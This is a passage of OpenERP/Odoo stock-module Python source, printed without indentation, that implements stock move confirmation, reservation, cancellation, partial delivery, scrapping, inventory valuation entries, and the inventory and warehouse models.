if old_ptype != picking.type:
old_pick_name = seq_obj.get(cr, uid, 'stock.picking.' + old_ptype)
self.pool.get('stock.picking').write(cr, uid, [picking.id], {'name': old_pick_name, 'type': old_ptype}, context=context)
else:
pickid = False
for move, (loc, dummy, delay, dummy, company_id, ptype, invoice_state) in todo:
new_id = move_obj.copy(cr, uid, move.id, {
'location_id': move.location_dest_id.id,
'location_dest_id': loc.id,
'date': time.strftime('%Y-%m-%d'),
'picking_id': pickid,
'state': 'waiting',
'company_id': company_id or res_obj._company_default_get(cr, uid, 'stock.company', context=context) ,
'move_history_ids': [],
'date_expected': (datetime.strptime(move.date, '%Y-%m-%d %H:%M:%S') + relativedelta(days=delay or 0)).strftime('%Y-%m-%d'),
'move_history_ids2': []}
)
move_obj.write(cr, uid, [move.id], {
'move_dest_id': new_id,
'move_history_ids': [(4, new_id)]
})
new_moves.append(self.browse(cr, uid, [new_id])[0])
if pickid:
wf_service.trg_validate(uid, 'stock.picking', pickid, 'button_confirm', cr)
if new_moves:
new_moves += self.create_chained_picking(cr, uid, new_moves, context)
return new_moves
def action_confirm(self, cr, uid, ids, context=None):
""" Confirms stock move.
@return: List of ids.
"""
moves = self.browse(cr, uid, ids, context=context)
self.write(cr, uid, ids, {'state': 'confirmed'})
self.create_chained_picking(cr, uid, moves, context)
return []
def action_assign(self, cr, uid, ids, *args):
""" Changes state to confirmed or waiting.
@return: List of values
"""
todo = []
for move in self.browse(cr, uid, ids):
if move.state in ('confirmed', 'waiting'):
todo.append(move.id)
res = self.check_assign(cr, uid, todo)
return res
def force_assign(self, cr, uid, ids, context=None):
""" Changes the state to assigned.
@return: True
"""
self.write(cr, uid, ids, {'state': 'assigned'})
wf_service = netsvc.LocalService('workflow')
for move in self.browse(cr, uid, ids, context):
if move.picking_id:
wf_service.trg_write(uid, 'stock.picking', move.picking_id.id, cr)
return True
def cancel_assign(self, cr, uid, ids, context=None):
""" Changes the state to confirmed.
@return: True
"""
self.write(cr, uid, ids, {'state': 'confirmed'})
# fix for bug lp:707031
# called write of related picking because changing move availability does
# not trigger workflow of picking in order to change the state of picking
wf_service = netsvc.LocalService('workflow')
for move in self.browse(cr, uid, ids, context):
if move.picking_id:
wf_service.trg_write(uid, 'stock.picking', move.picking_id.id, cr)
return True
#
# Duplicate stock.move
#
def check_assign(self, cr, uid, ids, context=None):
""" Checks the product type and accordingly writes the state.
@return: No. of moves done
"""
done = []
count = 0
pickings = {}
if context is None:
context = {}
for move in self.browse(cr, uid, ids, context=context):
if move.product_id.type == 'consu' or move.location_id.usage == 'supplier':
if move.state in ('confirmed', 'waiting'):
done.append(move.id)
pickings[move.picking_id.id] = 1
continue
if move.state in ('confirmed', 'waiting'):
# Important: we must pass lock=True to _product_reserve() to avoid race conditions and double reservations
res = self.pool.get('stock.location')._product_reserve(cr, uid, [move.location_id.id], move.product_id.id, move.product_qty, {'uom': move.product_uom.id}, lock=True)
if res:
#_product_available_test depends on the next status for correct functioning
#the test does not work correctly if the same product occurs multiple times
#in the same order. This is e.g. the case when using the button 'split in two' of
#the stock outgoing form
self.write(cr, uid, [move.id], {'state':'assigned'})
done.append(move.id)
pickings[move.picking_id.id] = 1
r = res.pop(0)
product_uos_qty = self.pool.get('stock.move').onchange_quantity(cr, uid, [move.id], move.product_id.id, r[0], move.product_id.uom_id.id, move.product_id.uos_id.id)['value']['product_uos_qty']
cr.execute('update stock_move set location_id=%s, product_qty=%s, product_uos_qty=%s where id=%s', (r[1], r[0],product_uos_qty, move.id))
while res:
r = res.pop(0)
product_uos_qty = self.pool.get('stock.move').onchange_quantity(cr, uid, [move.id], move.product_id.id, r[0], move.product_id.uom_id.id, move.product_id.uos_id.id)['value']['product_uos_qty']
move_id = self.copy(cr, uid, move.id, {'product_uos_qty': product_uos_qty, 'product_qty': r[0], 'location_id': r[1]})
done.append(move_id)
if done:
count += len(done)
self.write(cr, uid, done, {'state': 'assigned'})
if count:
for pick_id in pickings:
wf_service = netsvc.LocalService("workflow")
wf_service.trg_write(uid, 'stock.picking', pick_id, cr)
return count
def setlast_tracking(self, cr, uid, ids, context=None):
assert len(ids) == 1, "1 ID expected, got %s" % (ids, )
tracking_obj = self.pool['stock.tracking']
move = self.browse(cr, uid, ids[0], context=context)
picking_id = move.picking_id.id
if picking_id:
move_ids = self.search(cr, uid, [
('picking_id', '=', picking_id),
('tracking_id', '!=', False)
], limit=1, order='tracking_id DESC', context=context)
if move_ids:
tracking_move = self.browse(cr, uid, move_ids[0],
context=context)
tracking_id = tracking_move.tracking_id.id
else:
tracking_id = tracking_obj.create(cr, uid, {}, context=context)
self.write(cr, uid, move.id,
{'tracking_id': tracking_id},
context=context)
return True
#
# Cancel move => cancel others move and pickings
#
def action_cancel(self, cr, uid, ids, context=None):
""" Cancels the moves and if all moves are cancelled it cancels the picking.
@return: True
"""
if not len(ids):
return True
if context is None:
context = {}
pickings = set()
for move in self.browse(cr, uid, ids, context=context):
if move.state in ('confirmed', 'waiting', 'assigned', 'draft'):
if move.picking_id:
pickings.add(move.picking_id.id)
if move.move_dest_id and move.move_dest_id.state == 'waiting':
self.write(cr, uid, [move.move_dest_id.id], {'state': 'confirmed'}, context=context)
if context.get('call_unlink',False) and move.move_dest_id.picking_id:
wf_service = netsvc.LocalService("workflow")
wf_service.trg_write(uid, 'stock.picking', move.move_dest_id.picking_id.id, cr)
self.write(cr, uid, ids, {'state': 'cancel', 'move_dest_id': False}, context=context)
if not context.get('call_unlink',False):
for pick in self.pool.get('stock.picking').browse(cr, uid, list(pickings), context=context):
if all(move.state == 'cancel' for move in pick.move_lines):
self.pool.get('stock.picking').write(cr, uid, [pick.id], {'state': 'cancel'}, context=context)
wf_service = netsvc.LocalService("workflow")
for id in ids:
wf_service.trg_trigger(uid, 'stock.move', id, cr)
return True
def _get_accounting_data_for_valuation(self, cr, uid, move, context=None):
"""
Return the accounts and journal to use to post Journal Entries for the real-time
valuation of the move.
:param context: context dictionary that can explicitly mention the company to consider via the 'force_company' key
:raise: osv.except_osv() is any mandatory account or journal is not defined.
"""
product_obj=self.pool.get('product.product')
accounts = product_obj.get_product_accounts(cr, uid, move.product_id.id, context)
if move.location_id.valuation_out_account_id:
acc_src = move.location_id.valuation_out_account_id.id
else:
acc_src = accounts['stock_account_input']
if move.location_dest_id.valuation_in_account_id:
acc_dest = move.location_dest_id.valuation_in_account_id.id
else:
acc_dest = accounts['stock_account_output']
acc_valuation = accounts.get('property_stock_valuation_account_id', False)
journal_id = accounts['stock_journal']
if acc_dest == acc_valuation:
raise osv.except_osv(_('Error!'), _('Cannot create Journal Entry, Output Account of this product and Valuation account on category of this product are same.'))
if acc_src == acc_valuation:
raise osv.except_osv(_('Error!'), _('Cannot create Journal Entry, Input Account of this product and Valuation account on category of this product are same.'))
if not acc_src:
raise osv.except_osv(_('Error!'), _('Please define stock input account for this product or its category: "%s" (id: %d)') % \
(move.product_id.name, move.product_id.id,))
if not acc_dest:
raise osv.except_osv(_('Error!'), _('Please define stock output account for this product or its category: "%s" (id: %d)') % \
(move.product_id.name, move.product_id.id,))
if not journal_id:
raise osv.except_osv(_('Error!'), _('Please define journal on the product category: "%s" (id: %d)') % \
(move.product_id.categ_id.name, move.product_id.categ_id.id,))
if not acc_valuation:
raise osv.except_osv(_('Error!'), _('Please define inventory valuation account on the product category: "%s" (id: %d)') % \
(move.product_id.categ_id.name, move.product_id.categ_id.id,))
return journal_id, acc_src, acc_dest, acc_valuation
def _get_reference_accounting_values_for_valuation(self, cr, uid, move, context=None):
"""
Return the reference amount and reference currency representing the inventory valuation for this move.
These reference values should possibly be converted before being posted in Journals to adapt to the primary
and secondary currencies of the relevant accounts.
"""
product_uom_obj = self.pool.get('product.uom')
# by default the reference currency is that of the move's company
reference_currency_id = move.company_id.currency_id.id
default_uom = move.product_id.uom_id.id
qty = product_uom_obj._compute_qty(cr, uid, move.product_uom.id, move.product_qty, default_uom)
# if product is set to average price and a specific value was entered in the picking wizard,
# we use it
if move.location_dest_id.usage != 'internal' and move.product_id.cost_method == 'average':
reference_amount = qty * move.product_id.standard_price
elif move.product_id.cost_method == 'average' and move.price_unit:
reference_amount = qty * move.price_unit
reference_currency_id = move.price_currency_id.id or reference_currency_id
# Otherwise we default to the company's valuation price type, considering that the values of the
# valuation field are expressed in the default currency of the move's company.
else:
if context is None:
context = {}
currency_ctx = dict(context, currency_id = move.company_id.currency_id.id)
amount_unit = move.product_id.price_get('standard_price', context=currency_ctx)[move.product_id.id]
reference_amount = amount_unit * qty
return reference_amount, reference_currency_id
def _update_average_price(self, cr, uid, move, context=None):
product_obj = self.pool.get('product.product')
currency_obj = self.pool.get('res.currency')
uom_obj = self.pool.get('product.uom')
product_avail = {}
if (move.picking_id.type == 'in') and (move.product_id.cost_method == 'average'):
product = product_obj.browse(cr, uid, move.product_id.id)
move_currency_id = move.company_id.currency_id.id
context['currency_id'] = move_currency_id
product_qty = move.product_qty
product_uom = move.product_uom.id
product_price = move.price_unit
product_currency = move.price_currency_id.id
if product.id not in product_avail:
# keep track of stock on hand including processed lines not yet marked as done
product_avail[product.id] = product.qty_available
qty = uom_obj._compute_qty(cr, uid, product_uom, product_qty, product.uom_id.id)
if qty > 0:
new_price = currency_obj.compute(cr, uid, product_currency,
move_currency_id, product_price, round=False)
new_price = uom_obj._compute_price(cr, uid, product_uom, new_price,
product.uom_id.id)
if product_avail[product.id] <= 0:
product_avail[product.id] = 0
new_std_price = new_price
else:
# Get the standard price
amount_unit = product.price_get('standard_price', context=context)[product.id]
new_std_price = ((amount_unit * product_avail[product.id])\
+ (new_price * qty))/(product_avail[product.id] + qty)
product_obj.write(cr, uid, [product.id],{'standard_price': new_std_price})
product_avail[product.id] += qty
def _create_product_valuation_moves(self, cr, uid, move, context=None):
"""
Generate the appropriate accounting moves if the product being moves is subject
to real_time valuation tracking, and the source or destination location is
a transit location or is outside of the company.
"""
if move.product_id.valuation == 'real_time': # FIXME: product valuation should perhaps be a property?
if context is None:
context = {}
src_company_ctx = dict(context,force_company=move.location_id.company_id.id)
dest_company_ctx = dict(context,force_company=move.location_dest_id.company_id.id)
# do not take the company of the one of the user
# used to select the correct period
company_ctx = dict(context, company_id=move.company_id.id)
account_moves = []
# Outgoing moves (or cross-company output part)
if move.location_id.company_id \
and (move.location_id.usage == 'internal' and move.location_dest_id.usage != 'internal'\
or move.location_id.company_id != move.location_dest_id.company_id):
journal_id, acc_src, acc_dest, acc_valuation = self._get_accounting_data_for_valuation(cr, uid, move, src_company_ctx)
reference_amount, reference_currency_id = self._get_reference_accounting_values_for_valuation(cr, uid, move, src_company_ctx)
#returning goods to supplier
if move.location_dest_id.usage == 'supplier':
account_moves += [(journal_id, self._create_account_move_line(cr, uid, move, acc_valuation, acc_src, reference_amount, reference_currency_id, context))]
else:
account_moves += [(journal_id, self._create_account_move_line(cr, uid, move, acc_valuation, acc_dest, reference_amount, reference_currency_id, context))]
# Incoming moves (or cross-company input part)
if move.location_dest_id.company_id \
and (move.location_id.usage != 'internal' and move.location_dest_id.usage == 'internal'\
or move.location_id.company_id != move.location_dest_id.company_id):
journal_id, acc_src, acc_dest, acc_valuation = self._get_accounting_data_for_valuation(cr, uid, move, dest_company_ctx)
reference_amount, reference_currency_id = self._get_reference_accounting_values_for_valuation(cr, uid, move, src_company_ctx)
#goods return from customer
if move.location_id.usage == 'customer':
account_moves += [(journal_id, self._create_account_move_line(cr, uid, move, acc_dest, acc_valuation, reference_amount, reference_currency_id, context))]
else:
account_moves += [(journal_id, self._create_account_move_line(cr, uid, move, acc_src, acc_valuation, reference_amount, reference_currency_id, context))]
move_obj = self.pool.get('account.move')
for j_id, move_lines in account_moves:
move_obj.create(cr, uid,
{
'journal_id': j_id,
'line_id': move_lines,
'company_id': move.company_id.id,
'ref': move.picking_id and move.picking_id.name}, context=company_ctx)
def action_done(self, cr, uid, ids, context=None):
""" Makes the move done and if all moves are done, it will finish the picking.
@return:
"""
picking_ids = []
move_ids = []
wf_service = netsvc.LocalService("workflow")
if context is None:
context = {}
todo = []
for move in self.browse(cr, uid, ids, context=context):
if move.state=="draft":
todo.append(move.id)
if todo:
self.action_confirm(cr, uid, todo, context=context)
todo = []
for move in self.browse(cr, uid, ids, context=context):
if move.state in ['done','cancel']:
continue
move_ids.append(move.id)
if move.picking_id:
picking_ids.append(move.picking_id.id)
if move.move_dest_id.id and (move.state != 'done'):
# Downstream move should only be triggered if this move is the last pending upstream move
other_upstream_move_ids = self.search(cr, uid, [('id','not in',move_ids),('state','not in',['done','cancel']),
('move_dest_id','=',move.move_dest_id.id)], context=context)
if not other_upstream_move_ids:
self.write(cr, uid, [move.id], {'move_history_ids': [(4, move.move_dest_id.id)]})
if move.move_dest_id.state in ('waiting', 'confirmed'):
self.force_assign(cr, uid, [move.move_dest_id.id], context=context)
if move.move_dest_id.picking_id:
wf_service.trg_write(uid, 'stock.picking', move.move_dest_id.picking_id.id, cr)
if move.move_dest_id.auto_validate:
self.action_done(cr, uid, [move.move_dest_id.id], context=context)
self._update_average_price(cr, uid, move, context=context)
self._create_product_valuation_moves(cr, uid, move, context=context)
if move.state not in ('confirmed','done','assigned'):
todo.append(move.id)
if todo:
self.action_confirm(cr, uid, todo, context=context)
self.write(cr, uid, move_ids, {'state': 'done', 'date': time.strftime(DEFAULT_SERVER_DATETIME_FORMAT)}, context=context)
for id in move_ids:
wf_service.trg_trigger(uid, 'stock.move', id, cr)
for pick_id in picking_ids:
wf_service.trg_write(uid, 'stock.picking', pick_id, cr)
return True
def _create_account_move_line(self, cr, uid, move, src_account_id, dest_account_id, reference_amount, reference_currency_id, context=None):
"""
Generate the account.move.line values to post to track the stock valuation difference due to the
processing of the given stock move.
"""
# prepare default values considering that the destination accounts have the reference_currency_id as their main currency
partner_id = (move.picking_id.partner_id and self.pool.get('res.partner')._find_accounting_partner(move.picking_id.partner_id).id) or False
debit_line_vals = {
'name': move.name,
'product_id': move.product_id and move.product_id.id or False,
'quantity': move.product_qty,
'ref': move.picking_id and move.picking_id.name or False,
'date': time.strftime('%Y-%m-%d'),
'partner_id': partner_id,
'debit': reference_amount,
'account_id': dest_account_id,
}
credit_line_vals = {
'name': move.name,
'product_id': move.product_id and move.product_id.id or False,
'quantity': move.product_qty,
'ref': move.picking_id and move.picking_id.name or False,
'date': time.strftime('%Y-%m-%d'),
'partner_id': partner_id,
'credit': reference_amount,
'account_id': src_account_id,
}
# if we are posting to accounts in a different currency, provide correct values in both currencies correctly
# when compatible with the optional secondary currency on the account.
# Financial Accounts only accept amounts in secondary currencies if there's no secondary currency on the account
# or if it's the same as that of the secondary amount being posted.
account_obj = self.pool.get('account.account')
src_acct, dest_acct = account_obj.browse(cr, uid, [src_account_id, dest_account_id], context=context)
src_main_currency_id = src_acct.company_id.currency_id.id
dest_main_currency_id = dest_acct.company_id.currency_id.id
cur_obj = self.pool.get('res.currency')
if reference_currency_id != src_main_currency_id:
# fix credit line:
credit_line_vals['credit'] = cur_obj.compute(cr, uid, reference_currency_id, src_main_currency_id, reference_amount, context=context)
if (not src_acct.currency_id) or src_acct.currency_id.id == reference_currency_id:
credit_line_vals.update(currency_id=reference_currency_id, amount_currency=-reference_amount)
if reference_currency_id != dest_main_currency_id:
# fix debit line:
debit_line_vals['debit'] = cur_obj.compute(cr, uid, reference_currency_id, dest_main_currency_id, reference_amount, context=context)
if (not dest_acct.currency_id) or dest_acct.currency_id.id == reference_currency_id:
debit_line_vals.update(currency_id=reference_currency_id, amount_currency=reference_amount)
return [(0, 0, debit_line_vals), (0, 0, credit_line_vals)]
def unlink(self, cr, uid, ids, context=None):
if context is None:
context = {}
ctx = context.copy()
for move in self.browse(cr, uid, ids, context=context):
if move.state != 'draft' and not ctx.get('call_unlink', False):
raise osv.except_osv(_('User Error!'), _('You can only delete draft moves.'))
return super(stock_move, self).unlink(
cr, uid, ids, context=ctx)
# _create_lot function is not used anywhere
def _create_lot(self, cr, uid, ids, product_id, prefix=False):
""" Creates production lot
@return: Production lot id
"""
prodlot_obj = self.pool.get('stock.production.lot')
prodlot_id = prodlot_obj.create(cr, uid, {'prefix': prefix, 'product_id': product_id})
return prodlot_id
def action_scrap(self, cr, uid, ids, quantity, location_id, context=None):
""" Move the scrap/damaged product into scrap location
@param cr: the database cursor
@param uid: the user id
@param ids: ids of stock move object to be scrapped
@param quantity : specify scrap qty
@param location_id : specify scrap location
@param context: context arguments
@return: Scraped lines
"""
#quantity should in MOVE UOM
if quantity <= 0:
raise osv.except_osv(_('Warning!'), _('Please provide a positive quantity to scrap.'))
res = []
for move in self.browse(cr, uid, ids, context=context):
source_location = move.location_id
if move.state == 'done':
source_location = move.location_dest_id
if source_location.usage != 'internal':
#restrict to scrap from a virtual location because it's meaningless and it may introduce errors in stock ('creating' new products from nowhere)
raise osv.except_osv(_('Error!'), _('Forbidden operation: it is not allowed to scrap products from a virtual location.'))
move_qty = move.product_qty
uos_qty = quantity / move_qty * move.product_uos_qty
default_val = {
'location_id': source_location.id,
'product_qty': quantity,
'product_uos_qty': uos_qty,
'state': move.state,
'scrapped': True,
'location_dest_id': location_id,
'tracking_id': move.tracking_id.id,
'prodlot_id': move.prodlot_id.id,
}
new_move = self.copy(cr, uid, move.id, default_val)
res += [new_move]
product_obj = self.pool.get('product.product')
for product in product_obj.browse(cr, uid, [move.product_id.id], context=context):
if move.picking_id:
uom = product.uom_id.name if product.uom_id else ''
message = _("%s %s %s has been <b>moved to</b> scrap.") % (quantity, uom, product.name)
move.picking_id.message_post(body=message)
self.action_done(cr, uid, res, context=context)
return res
# action_split function is not used anywhere
# FIXME: deprecate this method
def action_split(self, cr, uid, ids, quantity, split_by_qty=1, prefix=False, with_lot=True, context=None):
""" Split Stock Move lines into production lot which specified split by quantity.
@param cr: the database cursor
@param uid: the user id
@param ids: ids of stock move object to be splited
@param split_by_qty : specify split by qty
@param prefix : specify prefix of production lot
@param with_lot : if true, prodcution lot will assign for split line otherwise not.
@param context: context arguments
@return: Splited move lines
"""
if context is None:
context = {}
if quantity <= 0:
raise osv.except_osv(_('Warning!'), _('Please provide proper quantity.'))
res = []
for move in self.browse(cr, uid, ids, context=context):
if split_by_qty <= 0 or quantity == 0:
return res
uos_qty = split_by_qty / move.product_qty * move.product_uos_qty
quantity_rest = quantity % split_by_qty
uos_qty_rest = split_by_qty / move.product_qty * move.product_uos_qty
update_val = {
'product_qty': split_by_qty,
'product_uos_qty': uos_qty,
}
for idx in range(int(quantity//split_by_qty)):
if not idx and move.product_qty<=quantity:
current_move = move.id
else:
current_move = self.copy(cr, uid, move.id, {'state': move.state})
res.append(current_move)
if with_lot:
update_val['prodlot_id'] = self._create_lot(cr, uid, [current_move], move.product_id.id)
self.write(cr, uid, [current_move], update_val)
if quantity_rest > 0:
idx = int(quantity//split_by_qty)
update_val['product_qty'] = quantity_rest
update_val['product_uos_qty'] = uos_qty_rest
if not idx and move.product_qty<=quantity:
current_move = move.id
else:
current_move = self.copy(cr, uid, move.id, {'state': move.state})
res.append(current_move)
if with_lot:
update_val['prodlot_id'] = self._create_lot(cr, uid, [current_move], move.product_id.id)
self.write(cr, uid, [current_move], update_val)
return res
def action_consume(self, cr, uid, ids, quantity, location_id=False, context=None):
""" Consumed product with specific quatity from specific source location
@param cr: the database cursor
@param uid: the user id
@param ids: ids of stock move object to be consumed
@param quantity : specify consume quantity
@param location_id : specify source location
@param context: context arguments
@return: Consumed lines
"""
#quantity should in MOVE UOM
if context is None:
context = {}
if quantity <= 0:
raise osv.except_osv(_('Warning!'), _('Please provide proper quantity.'))
res = []
for move in self.browse(cr, uid, ids, context=context):
move_qty = move.product_qty
if move_qty <= 0:
raise osv.except_osv(_('Error!'), _('Cannot consume a move with negative or zero quantity.'))
quantity_rest = move.product_qty
quantity_rest -= quantity
uos_qty_rest = quantity_rest / move_qty * move.product_uos_qty
if quantity_rest <= 0:
quantity_rest = 0
uos_qty_rest = 0
quantity = move.product_qty
uos_qty = quantity / move_qty * move.product_uos_qty
if float_compare(quantity_rest, 0, precision_rounding=move.product_id.uom_id.rounding):
default_val = {
'product_qty': quantity,
'product_uos_qty': uos_qty,
'state': move.state,
'location_id': location_id or move.location_id.id,
}
current_move = self.copy(cr, uid, move.id, default_val)
res += [current_move]
update_val = {}
update_val['product_qty'] = quantity_rest
update_val['product_uos_qty'] = uos_qty_rest
self.write(cr, uid, [move.id], update_val)
else:
quantity_rest = quantity
uos_qty_rest = uos_qty
res += [move.id]
update_val = {
'product_qty' : quantity_rest,
'product_uos_qty' : uos_qty_rest,
'location_id': location_id or move.location_id.id,
}
self.write(cr, uid, [move.id], update_val)
self.action_done(cr, uid, res, context=context)
return res
# FIXME: needs refactoring, this code is partially duplicated in stock_picking.do_partial()!
def do_partial(self, cr, uid, ids, partial_datas, context=None):
""" Makes partial pickings and moves done.
@param partial_datas: Dictionary containing details of partial picking
like partner_id, delivery_date, delivery
moves with product_id, product_qty, uom
"""
res = {}
picking_obj = self.pool.get('stock.picking')
wf_service = netsvc.LocalService("workflow")
if context is None:
context = {}
complete, too_many, too_few = [], [], []
move_product_qty = {}
prodlot_ids = {}
for move in self.browse(cr, uid, ids, context=context):
if move.state in ('done', 'cancel'):
continue
partial_data = partial_datas.get('move%s'%(move.id), False)
assert partial_data, _('Missing partial picking data for move #%s.') % (move.id)
product_qty = partial_data.get('product_qty',0.0)
move_product_qty[move.id] = product_qty
product_uom = partial_data.get('product_uom',False)
product_price = partial_data.get('product_price',0.0)
product_currency = partial_data.get('product_currency',False)
prodlot_ids[move.id] = partial_data.get('prodlot_id')
if move.product_qty == product_qty:
complete.append(move)
elif move.product_qty > product_qty:
too_few.append(move)
else:
too_many.append(move)
if (move.picking_id.type == 'in') and (move.product_id.cost_method == 'average'):
# Record the values that were chosen in the wizard, so they can be
# used for average price computation and inventory valuation
self.write(cr, uid, [move.id],
{'price_unit': product_price,
'price_currency_id': product_currency,
})
for move in too_few:
product_qty = move_product_qty[move.id]
if product_qty != 0:
defaults = {
'product_qty' : product_qty,
'product_uos_qty': product_qty,
'picking_id' : move.picking_id.id,
'state': 'assigned',
'move_dest_id': False,
'price_unit': move.price_unit,
}
prodlot_id = prodlot_ids[move.id]
if prodlot_id:
defaults.update(prodlot_id=prodlot_id)
new_move = self.copy(cr, uid, move.id, defaults)
complete.append(self.browse(cr, uid, new_move))
self.write(cr, uid, [move.id],
{
'product_qty': move.product_qty - product_qty,
'product_uos_qty': move.product_qty - product_qty,
'prodlot_id': False,
'tracking_id': False,
})
for move in too_many:
self.write(cr, uid, [move.id],
{
'product_qty': move.product_qty,
'product_uos_qty': move.product_qty,
})
complete.append(move)
for move in complete:
if prodlot_ids.get(move.id):
self.write(cr, uid, [move.id],{'prodlot_id': prodlot_ids.get(move.id)})
self.action_done(cr, uid, [move.id], context=context)
if move.picking_id.id :
# TOCHECK : Done picking if all moves are done
cr.execute("""
SELECT move.id FROM stock_picking pick
RIGHT JOIN stock_move move ON move.picking_id = pick.id AND move.state = %s
WHERE pick.id = %s""",
('done', move.picking_id.id))
res = cr.fetchall()
if len(res) == len(move.picking_id.move_lines):
picking_obj.action_move(cr, uid, [move.picking_id.id])
wf_service.trg_validate(uid, 'stock.picking', move.picking_id.id, 'button_done', cr)
return [move.id for move in complete]
stock_move()
class stock_inventory(osv.osv):
_name = "stock.inventory"
_description = "Inventory"
_columns = {
'name': fields.char('Inventory Reference', size=64, required=True, readonly=True, states={'draft': [('readonly', False)]}),
'date': fields.datetime('Creation Date', required=True, readonly=True, states={'draft': [('readonly', False)]}),
'date_done': fields.datetime('Date done'),
'inventory_line_id': fields.one2many('stock.inventory.line', 'inventory_id', 'Inventories', readonly=True, states={'draft': [('readonly', False)]}),
'move_ids': fields.many2many('stock.move', 'stock_inventory_move_rel', 'inventory_id', 'move_id', 'Created Moves'),
'state': fields.selection( (('draft', 'Draft'), ('cancel','Cancelled'), ('confirm','Confirmed'), ('done', 'Done')), 'Status', readonly=True, select=True),
'company_id': fields.many2one('res.company', 'Company', required=True, select=True, readonly=True, states={'draft':[('readonly',False)]}),
}
_defaults = {
'date': lambda *a: time.strftime('%Y-%m-%d %H:%M:%S'),
'state': 'draft',
'company_id': lambda self,cr,uid,c: self.pool.get('res.company')._company_default_get(cr, uid, 'stock.inventory', context=c)
}
def copy(self, cr, uid, id, default=None, context=None):
if default is None:
default = {}
default = default.copy()
default.update({'move_ids': [], 'date_done': False})
return super(stock_inventory, self).copy(cr, uid, id, default, context=context)
def _inventory_line_hook(self, cr, uid, inventory_line, move_vals):
""" Creates a stock move from an inventory line
@param inventory_line:
@param move_vals:
@return:
"""
return self.pool.get('stock.move').create(cr, uid, move_vals)
def action_done(self, cr, uid, ids, context=None):
""" Finish the inventory
@return: True
"""
if context is None:
context = {}
move_obj = self.pool.get('stock.move')
for inv in self.browse(cr, uid, ids, context=context):
move_obj.action_done(cr, uid, [x.id for x in inv.move_ids], context=context)
self.write(cr, uid, [inv.id], {'state':'done', 'date_done': time.strftime('%Y-%m-%d %H:%M:%S')}, context=context)
return True
def action_confirm(self, cr, uid, ids, context=None):
""" Confirm the inventory and writes its finished date
@return: True
"""
if context is None:
context = {}
# to perform the correct inventory corrections we need analyze stock location by
# location, never recursively, so we use a special context
product_context = dict(context, compute_child=False)
location_obj = self.pool.get('stock.location')
for inv in self.browse(cr, uid, ids, context=context):
move_ids = []
for line in inv.inventory_line_id:
pid = line.product_id.id
product_context.update(uom=line.product_uom.id, to_date=inv.date, date=inv.date, prodlot_id=line.prod_lot_id.id)
amount = location_obj._product_get(cr, uid, line.location_id.id, [pid], product_context)[pid]
change = line.product_qty - amount
lot_id = line.prod_lot_id.id
if change:
location_id = line.product_id.property_stock_inventory.id
value = {
'name': _('INV:') + (line.inventory_id.name or ''),
'product_id': line.product_id.id,
'product_uom': line.product_uom.id,
'prodlot_id': lot_id,
'date': inv.date,
}
if change > 0:
value.update( {
'product_qty': change,
'location_id': location_id,
'location_dest_id': line.location_id.id,
})
else:
value.update( {
'product_qty': -change,
'location_id': line.location_id.id,
'location_dest_id': location_id,
})
move_ids.append(self._inventory_line_hook(cr, uid, line, value))
self.write(cr, uid, [inv.id], {'state': 'confirm', 'move_ids': [(6, 0, move_ids)]})
self.pool.get('stock.move').action_confirm(cr, uid, move_ids, context=context)
return True
def action_cancel_draft(self, cr, uid, ids, context=None):
""" Cancels the stock move and change inventory state to draft.
@return: True
"""
for inv in self.browse(cr, uid, ids, context=context):
self.pool.get('stock.move').action_cancel(cr, uid, [x.id for x in inv.move_ids], context=context)
self.write(cr, uid, [inv.id], {'state':'draft'}, context=context)
return True
def action_cancel_inventory(self, cr, uid, ids, context=None):
""" Cancels both stock move and inventory
@return: True
"""
move_obj = self.pool.get('stock.move')
account_move_obj = self.pool.get('account.move')
for inv in self.browse(cr, uid, ids, context=context):
move_obj.action_cancel(cr, uid, [x.id for x in inv.move_ids], context=context)
for move in inv.move_ids:
account_move_ids = account_move_obj.search(cr, uid, [('name', '=', move.name)])
if account_move_ids:
account_move_data_l = account_move_obj.read(cr, uid, account_move_ids, ['state'], context=context)
for account_move in account_move_data_l:
if account_move['state'] == 'posted':
raise osv.except_osv(_('User Error!'),
_('In order to cancel this inventory, you must first unpost related journal entries.'))
account_move_obj.unlink(cr, uid, [account_move['id']], context=context)
self.write(cr, uid, [inv.id], {'state': 'cancel'}, context=context)
return True
stock_inventory()
class stock_inventory_line(osv.osv):
_name = "stock.inventory.line"
_description = "Inventory Line"
_rec_name = "inventory_id"
_columns = {
'inventory_id': fields.many2one('stock.inventory', 'Inventory', ondelete='cascade', select=True),
'location_id': fields.many2one('stock.location', 'Location', required=True),
'product_id': fields.many2one('product.product', 'Product', required=True, select=True),
'product_uom': fields.many2one('product.uom', 'Product Unit of Measure', required=True),
'product_qty': fields.float('Quantity', digits_compute=dp.get_precision('Product Unit of Measure')),
'company_id': fields.related('inventory_id','company_id',type='many2one',relation='res.company',string='Company',store=True, select=True, readonly=True),
'prod_lot_id': fields.many2one('stock.production.lot', 'Serial Number', domain="[('product_id','=',product_id)]"),
'state': fields.related('inventory_id','state',type='char',string='Status',readonly=True),
}
def _default_stock_location(self, cr, uid, context=None):
try:
location_model, location_id = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'stock', 'stock_location_stock')
with tools.mute_logger('openerp.osv.orm'):
self.pool.get('stock.location').check_access_rule(cr, uid, [location_id], 'read', context=context)
except (orm.except_orm, ValueError):
location_id = False
return location_id
_defaults = {
'location_id': _default_stock_location
}
def on_change_product_id(self, cr, uid, ids, location_id, product, uom=False, to_date=False):
""" Changes UoM and name if product_id changes.
@param location_id: Location id
@param product: Changed product_id
@param uom: UoM product
@return: Dictionary of changed values
"""
if not product:
return {'value': {'product_qty': 0.0, 'product_uom': False, 'prod_lot_id': False}}
obj_product = self.pool.get('product.product').browse(cr, uid, product)
uom = uom or obj_product.uom_id.id
amount = self.pool.get('stock.location')._product_get(cr, uid, location_id, [product], {'uom': uom, 'to_date': to_date, 'compute_child': False})[product]
result = {'product_qty': amount, 'product_uom': uom, 'prod_lot_id': False}
return {'value': result}
stock_inventory_line()
#----------------------------------------------------------
# Stock Warehouse
#----------------------------------------------------------
class stock_warehouse(osv.osv):
_name = "stock.warehouse"
_description = "Warehouse"
_columns = {
'name': fields.char('Name', size=128, required=True, select=True),
'company_id': fields.many2one('res.company', 'Company', required=True, select=True),
'partner_id': fields.many2one('res.partner', 'Owner Address'),
'lot_input_id': fields.many2one('stock.location', 'Location Input', required=True, domain=[('usage','<>','view')]),
'lot_stock_id': fields.many2one('stock.location', 'Location Stock', required=True, domain=[('usage','=','internal')]),
'lot_output_id': fields.many2one('stock.location', 'Location Output', required=True, domain=[('usage','<>','view')]),
}
